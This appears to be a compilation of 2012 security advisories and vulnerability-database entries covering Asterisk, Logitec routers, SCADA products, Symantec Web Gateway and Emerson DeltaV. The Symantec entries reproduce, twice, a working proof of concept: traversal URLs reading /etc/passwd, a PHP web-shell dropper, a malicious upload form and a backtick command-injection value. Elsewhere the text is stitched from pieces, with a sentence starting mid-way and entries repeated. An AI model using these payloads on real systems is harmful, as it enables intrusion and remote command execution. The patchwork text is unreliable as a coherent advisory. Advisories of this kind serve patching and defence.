Gentoo Linux Security Advisory GLSA 201206-05
http://security.gentoo.org/
Severity: Normal
Title: Asterisk: Multiple vulnerabilities
Date: June 21, 2012
Bugs: #413353, #418189, #418191
ID: 201206-05

Synopsis
========
Multiple vulnerabilities in Asterisk might allow remote attackers to execute arbitrary code.

Background
==========
Asterisk is an open source telephony engine and toolkit.

Affected packages
=================
Package / Vulnerable / Unaffected
1 net-misc/asterisk < 1.8.12.1 >= 1.8.12.1

Description
===========
Multiple vulnerabilities have been found in Asterisk:
* An error in manager.c allows shell access through the MixMonitor application, GetVar, or Status (CVE-2012-2414).
* An error in chan_skinny.c could cause a heap-based buffer overflow (CVE-2012-2415).
* An error in chan_sip.c prevents Asterisk from checking if a channel exists before connected line updates (CVE-2012-2416).
* An error in chan_iax2.c may cause an invalid pointer to be called (CVE-2012-2947).
* chan_skinny.c contains a NULL pointer dereference (CVE-2012-2948).

Impact
======
A remote attacker could execute arbitrary code with the privileges of the process or cause a Denial of Service condition.

Workaround
==========
There is no known workaround at this time.

Resolution
==========
All Asterisk users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/asterisk-1.8.12.1"

References
==========
[ 1 ] CVE-2012-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2414
[ 2 ] CVE-2012-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2415
[ 3 ] CVE-2012-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2416
[ 4 ] CVE-2012-2947 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2947
[ 5 ] CVE-2012-2948 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2948

Availability
============
This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201206-05.xml

When an SCCP client closes its connection to the server, a pointer in a structure is set to Null. If the client was not in the on-hook state at the time the connection was closed, this pointer is later dereferenced. "Off hook") to crash the server. Successful exploitation of this vulnerability would result in termination of the server, causing denial of service to legitimate users.
Resolution: The pointer to the device in the structure is now checked before it is dereferenced in the channel event callbacks and message handling functions.

Affected Versions
  Product                Release Series
  Asterisk Open Source   1.8.x            All Versions
  Asterisk Open Source   10.x             All Versions
  Certified Asterisk     1.8.11-cert      1.8.11-cert1

Corrected In
  Product                Release
  Asterisk Open Source   1.8.12.1, 10.4.1
  Certified Asterisk     1.8.11-cert2

Patches
  SVN URL                                                                   Revision
  http://downloads.asterisk.org/pub/security/AST-2012-008-1.8.diff          v1.8
  http://downloads.asterisk.org/pub/security/AST-2012-008-10.diff           v10
  http://downloads.asterisk.org/pub/security/AST-2012-008-1.8.11-cert.diff  v1.8.11-cert

Links: https://issues.asterisk.org/jira/browse/ASTERISK-19905

Asterisk Project Security Advisories are posted at http://www.asterisk.org/security. This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2012-008.pdf and http://downloads.digium.com/pub/security/AST-2012-008.html

Revision History
  Date        Editor       Revisions Made
  05/25/2012  Matt Jordan  Initial Release

Asterisk Project Security Advisory - AST-2012-008
Copyright (c) 2012 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.

Full-Disclosure - We believe in it.

In addition, it was discovered that Asterisk does not set the alwaysauthreject option by default in the SIP channel driver. This allows remote attackers to observe a difference in response behavior and check for the presence of account names. (CVE-2011-2666) System administrators concerned by this user-enumeration vulnerability should enable the alwaysauthreject option in the configuration. We do not plan to change the default setting in the stable version (Asterisk 1.6) in order to preserve backwards compatibility.
For the testing distribution (wheezy) and the unstable distribution (sid), this problem has been fixed in version 1:1.8.13.0~dfsg-1. We recommend that you upgrade your asterisk packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org
TITLE: Asterisk Two Denial of Service Vulnerabilities
SECUNIA ADVISORY ID: SA49303
VERIFY ADVISORY: http://secunia.com/advisories/49303/
RELEASE DATE: 2012-05-30

DESCRIPTION: Two vulnerabilities have been reported in Asterisk, which can be exploited by malicious people to cause a DoS (Denial of Service).
1) An error in the IAX2 channel driver within the "handle_request_update()" function (channels/chan_sip.c) when placing an established call on hold can be exploited to cause a crash via specially crafted packets. Successful exploitation of this vulnerability requires that the setting mohinterpret=passthrough is set and that the call is placed on hold without a suggested music-on-hold class name.
2) An error in the SCCP (Skinny) channel driver (channels/chan_skinny.c) when handling termination of a client's connection can be exploited to cause a crash by closing a connection to the server in certain call states.
The vulnerabilities are reported in versions 1.8.11-cert prior to 1.8.11-cert2, 1.8.x prior to 1.8.12.1, and 10.x prior to 10.4.1.

SOLUTION: Update to a fixed version.

PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) mgrobecker 2) Christoph Hebeisen

ORIGINAL ADVISORY:
http://downloads.asterisk.org/pub/security/AST-2012-007.html
http://downloads.asterisk.org/pub/security/AST-2012-008.html

About: This Advisory was delivered by Secunia as a free service to help private users keep their systems up to date against the latest vulnerabilities. Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
VAR-201206-0345 CVE-2012-1250 Logitec LAN-W300N/R series fails to restrict access permissions CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Logitec LAN-W300N/R routers with firmware before 2.27 do not properly restrict login access, which allows remote attackers to obtain administrative privileges and modify settings via vectors related to PPPoE authentication. The LAN-W300N/R series are wireless LAN routers. Logitec LAN-W300N/R series contain an issue where access permissions are not restricted. Jin Sawada, Keisuke Okazaki, Naoto Katsumi of Security Engineering Laboratory, IT Security Center (ISEC), IPA reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under the Information Security Early Warning Partnership. An attacker that can access the product may log in with administrative privileges. As a result, settings may be changed or altered by the attacker who logged in to LAN-W300N/R. Multiple Logitec LAN-W300N products are prone to a security-bypass vulnerability.
TITLE: Logitec LAN-W300N Multiple Products Security Bypass Vulnerability
SECUNIA ADVISORY ID: SA49289
VERIFY ADVISORY: http://secunia.com/advisories/49289/
RELEASE DATE: 2012-05-25

DESCRIPTION: A vulnerability has been reported in Logitec LAN-W300N/R, LAN-W300N/RS, and LAN-W300N/RU2, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is reported in firmware version 2.17. Other versions may also be affected.

SOLUTION: Update to a fixed version (please see the vendor's advisory for details).

ORIGINAL ADVISORY:
Logitec (Japanese): http://www.logitec.co.jp/info/2012/0516.html?link_id=out_oshirase_20120516_2_2
JVN: http://jvn.jp/en/jp/JVN85934986/index.html
http://jvndb.jvn.jp/en/contents/2012/JVNDB-2012-000051.html
VAR-201205-0302 CVE-2012-1824 Measuresoft ScadaPro Client and ScadaPro Server vulnerability allowing privileges to be gained CVSS V2: 7.2
CVSS V3: -
Severity: HIGH
Untrusted search path vulnerability in Measuresoft ScadaPro Client before 4.0.0 and ScadaPro Server before 4.0.0 allows local users to gain privileges via a Trojan horse DLL in the current working directory. It may be possible to gain privileges through a DLL file. Measuresoft ScadaPro is a SCADA system for power, oil and gas, pharmaceutical and other companies. Measuresoft ScadaPro uses a fixed or controllable search path to discover resources, allowing an attacker to place a malicious DLL file where it is loaded before the legitimate DLL, which can cause arbitrary code to be executed in the context of the application. Measuresoft ScadaPro is prone to a vulnerability that lets attackers execute arbitrary code. An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
VAR-201207-0299 CVE-2012-3847 Invensys Wonderware SuiteLink Denial of service vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
slssvc.exe in Invensys Wonderware SuiteLink in Invensys InTouch 2012 and Wonderware Application Server 2012 allows remote attackers to cause a denial of service (resource consumption) via a long Unicode string, a different vulnerability than CVE-2012-3007. Wonderware is industrial control and automation software.

TITLE: Invensys Wonderware InTouch SuiteLink Service Denial of Service Vulnerability
SECUNIA ADVISORY ID: SA49173
VERIFY ADVISORY: http://secunia.com/advisories/49173/
RELEASE DATE: 2012-05-16

DESCRIPTION: Luigi Auriemma has discovered a vulnerability in Invensys Wonderware InTouch, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error within the SuiteLink Service (slssvc.exe) when processing certain packets. This can be exploited to cause the service to crash via a specially crafted packet sent to TCP port 5413. The vulnerability is confirmed in version 10.1.300 Build 0268 (slssvc.exe version 51.5.0.0). Other versions may also be affected.

SOLUTION: Restrict access to trusted hosts only.

PROVIDED AND/OR DISCOVERED BY: Luigi Auriemma

ORIGINAL ADVISORY: Luigi Auriemma: http://aluigi.altervista.org/adv/suitelink_1-adv.txt
VAR-201205-0220 CVE-2012-0297 Symantec Web Gateway Remote Shell Command Execution Vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data. Authentication is not required to exploit this vulnerability. The specific flaw exists due to insufficiently filtered user-supplied data used in a call to exec() in multiple script pages. The affected scripts are located in '/spywall/ipchange.php' and 'network.php'. There is also a flaw in '/spywall/download_file.php' that allows unauthenticated users to download and delete any file on the server. Symantec Web Gateway is a Web security gateway hardware appliance. Due to weak validation and lack of filtering of user-controlled input, an attacker can inject arbitrary code into an application script and execute it with application privileges. Successful exploits will result in the execution of arbitrary attacker-supplied commands in the context of the affected application. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more.

Software: Symantec Web Gateway
Current Software Version: 5.0.2.8
Product homepage: www.symantec.com
Author: S2 Crew [Hungary]
CVE: CVE-2012-0297, CVE-2012-0298, ???

File include:
https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd

File include and OS command execution:
http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd
You can execute OS commands just include the error_log: /usr/local/apache2/logs/
-rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log
-rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log
Make a connection to port 80:
<?php
$f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');
$cmd = "<?php system(\$_GET['cmd']); ?>";
fputs($f,$cmd);
fclose($f);
print "Shell creation done<br>";
?>

Arbitrary file download and delete:
https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog
d parameter: the complete filename. After the download process the application removes the original file with root access! :)

Command execution methods:
1. Method: Download and delete the /var/www/html/ciu/.htaccess file. After it you can access the ciu interface on web. There is an upload script: /ciu/uploadFile.php. User can control the filename and the upload location: $_FILES['uploadFile']; $_POST['uploadLocation'];
2. Method:
<form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">
<input type="file" name="uploadFile">
<input type="text" name="action" value="upload">
<input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">
<input type="hidden" name="configuration" value="test">
<input type="submit" value="upload!">
</form>
The "/var/www/html/spywall/cleaner" is writeable by www-data.

Command execution after authentication:
http://192.168.82.207/spywall/adminConfig.php (this is a deprecated config file; it should be removed)
From the modified POST message:
Content-Disposition: form-data; name="pingaddress"
127.0.0.1`whoami>/tmp/1234.txt`

Vendor Response: Symantec has issued an update to correct this vulnerability.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/
TITLE: Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA49216
VERIFY ADVISORY: http://secunia.com/advisories/49216/
RELEASE DATE: 2012-05-18

DESCRIPTION: Multiple vulnerabilities have been reported in Symantec Web Gateway, which can be exploited by malicious people to disclose potentially sensitive information, conduct cross-site scripting attacks, manipulate certain data, and compromise a vulnerable system.
1) An unspecified error can be exploited to inject arbitrary commands. No further information is currently available.
2) Certain unspecified input is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.
3) Certain unspecified input is not properly verified before being used to download or delete arbitrary files. This can be exploited to remove or disclose the contents of arbitrary files.
4) Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerabilities are reported in versions prior to 5.0.3.

SOLUTION: Update to version 5.0.3.

PROVIDED AND/OR DISCOVERED BY:
1-3) The vendor credits Tenable Network Security via ZDI and an anonymous person via SecuriTeam Secure Disclosure.
4) The vendor credits Ajay Pal Singh Atwal and an anonymous person.

ORIGINAL ADVISORY: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00
VAR-201205-0222 CVE-2012-0299 Symantec Web Gateway arbitrary code upload vulnerability in the management GUI CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to upload arbitrary code to a designated pathname, and possibly execute this code, via unspecified vectors. Authentication is not required to exploit this vulnerability. The specific flaw exists because Symantec Web Gateway allows unauthenticated users to upload a file while preserving the file extension. Symantec Web Gateway is a Web security gateway hardware appliance. This may facilitate unauthorized access or OS command execution with elevated privileges; other attacks are also possible. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more.

Vendor Response: Symantec has issued an update to correct this vulnerability.
VAR-201205-0221 CVE-2012-0298 Symantec Web Gateway arbitrary file read vulnerability in the management GUI file-management scripts CVSS V2: 6.4
CVSS V3: -
Severity: MEDIUM
The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to (1) read or (2) delete arbitrary files via unspecified vectors. A vulnerability exists that allows arbitrary files to be (1) read or (2) deleted; a third party may therefore (1) read or (2) delete arbitrary files. A vulnerability exists in Symantec Web Gateway. A successful exploit could render the system unusable. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more.
Software: Symantec Web Gateway
Current Software Version: 5.0.2.8
Product homepage: www.symantec.com
Author: S2 Crew [Hungary]
CVE: CVE-2012-0297, CVE-2012-0298, ???
File include:
https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd
File include and OS command execution:
http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd
You can execute OS commands by just including the error_log:
/usr/local/apache2/logs/
-rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log
-rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log
Make a connection to port 80:
<?php
$f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');
$cmd = "<?php system(\$_GET['cmd']); ?>";
fputs($f,$cmd);
fclose($f);
print "Shell creation done<br>";
?>
Arbitrary file download and delete:
https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog
d parameter: the complete filename
After the download process the application removes the original file with root access! :)
Command execution methods:
Method 1:
Download and delete the /var/www/html/ciu/.htaccess file. After that you can access the ciu interface on the web.
There is an upload script: /ciu/uploadFile.php
The user can control the filename and the upload location:
$_FILES['uploadFile'];
$_POST['uploadLocation'];
Method 2:
<form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">
<input type="file" name="uploadFile">
<input type="text" name="action" value="upload">
<input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">
<input type="hidden" name="configuration" value="test">
<input type="submit" value="upload!">
</form>
The "/var/www/html/spywall/cleaner" directory is writeable by www-data.
Command execution after authentication:
http://192.168.82.207/spywall/adminConfig.php (this is a deprecated config file; it should be removed)
From the modified POST message:
Content-Disposition: form-data; name="pingaddress"
127.0.0.1`whoami>/tmp/1234.txt`
----------------------------------------------------------------------
TITLE: Symantec Web Gateway Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA49216
VERIFY ADVISORY:
Secunia.com http://secunia.com/advisories/49216/
Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49216
RELEASE DATE: 2012-05-18
DISCUSS ADVISORY: http://secunia.com/advisories/49216/#comments
DESCRIPTION:
Multiple vulnerabilities have been reported in Symantec Web Gateway, which can be exploited by malicious people to disclose potentially sensitive information, conduct cross-site scripting attacks, manipulate certain data, and compromise a vulnerable system.
1) An unspecified error can be exploited to inject arbitrary commands. No further information is currently available.
2) Certain unspecified input is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.
3) Certain unspecified input is not properly verified before being used to download or delete arbitrary files. This can be exploited to remove or disclose the contents of arbitrary files.
4) Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
The vulnerabilities are reported in versions prior to 5.0.3.
SOLUTION: Update to version 5.0.3.
PROVIDED AND/OR DISCOVERED BY:
1-3) The vendor credits Tenable Network Security via ZDI and an anonymous person via SecuriTeam Secure Disclosure.
4) The vendor credits Ajay Pal Singh Atwal and an anonymous person.
ORIGINAL ADVISORY: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00
----------------------------------------------------------------------
VAR-201206-0259 CVE-2012-1816 Emerson DeltaV PORTSERV.exe denial of service (daemon crash) vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
PORTSERV.exe in Emerson DeltaV and DeltaV Workstations 9.3.1, 10.3.1, 11.3, and 11.3.1 and DeltaV ProEssentials Scientific Graph 5.0.0.6 allows remote attackers to cause a denial of service (daemon crash) via a crafted (1) TCP or (2) UDP packet to port 111. Emerson Electric is a diversified global manufacturer. It provides network energy, process management, industrial automation, environmental optimization technology, tools and storage. Multiple DeltaV products are prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to access or modify data, to exploit latent vulnerabilities in the underlying database, to execute arbitrary code, to overwrite arbitrary files on the victim's computer in the context of the vulnerable application that is using the ActiveX control (typically Internet Explorer), or to cause a denial-of-service condition. Other attacks are possible.
----------------------------------------------------------------------
TITLE: DeltaV Products Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA49210
VERIFY ADVISORY:
Secunia.com http://secunia.com/advisories/49210/
Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49210
RELEASE DATE: 2012-05-17
DISCUSS ADVISORY: http://secunia.com/advisories/49210/#comments
DESCRIPTION:
Multiple vulnerabilities have been reported in DeltaV products, which can be exploited by malicious people to conduct cross-site scripting attacks, SQL injection attacks, cause a DoS (Denial of Service), and compromise a vulnerable system.
1) Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
2) Certain unspecified input is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
3) An error within PORTSERV.exe can be exploited to cause a crash via a specially crafted packet sent to TCP or UDP port 111.
4) An error within the processing of certain fields in project files can be exploited to cause a buffer overflow via a specially crafted project file.
5) An insecure method within an ActiveX control can be exploited to overwrite arbitrary files.
Successful exploitation of vulnerabilities #4 and #5 may allow execution of arbitrary code.
The vulnerabilities are reported in the following applications:
* DeltaV and DeltaV Workstations versions 9.3.1, 10.3.1, 11.3, and 11.3.1
* DeltaV ProEssentials Scientific Graph version 5.0.0.6
SOLUTION: Apply hotfix (please contact the vendor for more information).
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Kuang-Chun Hung, Security Research and Service Institute.
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-12-137-01.pdf
----------------------------------------------------------------------
VAR-201206-0257 CVE-2012-1814 DeltaV Multiple Product Cross-Site Scripting Vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in Emerson DeltaV and DeltaV Workstations 9.3.1, 10.3.1, 11.3, and 11.3.1 and DeltaV ProEssentials Scientific Graph 5.0.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Emerson Electric is a diversified global manufacturer. It provides network energy, process management, industrial automation, environmental optimization technology, tools and storage. Cross-site scripting vulnerabilities exist in multiple Emerson Electric DeltaV products; an attacker can exploit them by building a malicious web page and enticing a user to open it, in order to obtain sensitive information or hijack a user session. Multiple DeltaV products are prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to access or modify data, to exploit latent vulnerabilities in the underlying database, to execute arbitrary code, to overwrite arbitrary files on the victim's computer in the context of the vulnerable application that is using the ActiveX control (typically Internet Explorer), or to cause a denial-of-service condition. Other attacks are possible.
----------------------------------------------------------------------
TITLE: DeltaV Products Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA49210
VERIFY ADVISORY:
Secunia.com http://secunia.com/advisories/49210/
Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49210
RELEASE DATE: 2012-05-17
DISCUSS ADVISORY: http://secunia.com/advisories/49210/#comments
DESCRIPTION:
Multiple vulnerabilities have been reported in DeltaV products, which can be exploited by malicious people to conduct cross-site scripting attacks, SQL injection attacks, cause a DoS (Denial of Service), and compromise a vulnerable system.
1) Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
2) Certain unspecified input is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
3) An error within PORTSERV.exe can be exploited to cause a crash via a specially crafted packet sent to TCP or UDP port 111.
4) An error within the processing of certain fields in project files can be exploited to cause a buffer overflow via a specially crafted project file.
5) An insecure method within an ActiveX control can be exploited to overwrite arbitrary files.
Successful exploitation of vulnerabilities #4 and #5 may allow execution of arbitrary code.
The vulnerabilities are reported in the following applications:
* DeltaV and DeltaV Workstations versions 9.3.1, 10.3.1, 11.3, and 11.3.1
* DeltaV ProEssentials Scientific Graph version 5.0.0.6
SOLUTION: Apply hotfix (please contact the vendor for more information).
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Kuang-Chun Hung, Security Research and Service Institute.
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-12-137-01.pdf
----------------------------------------------------------------------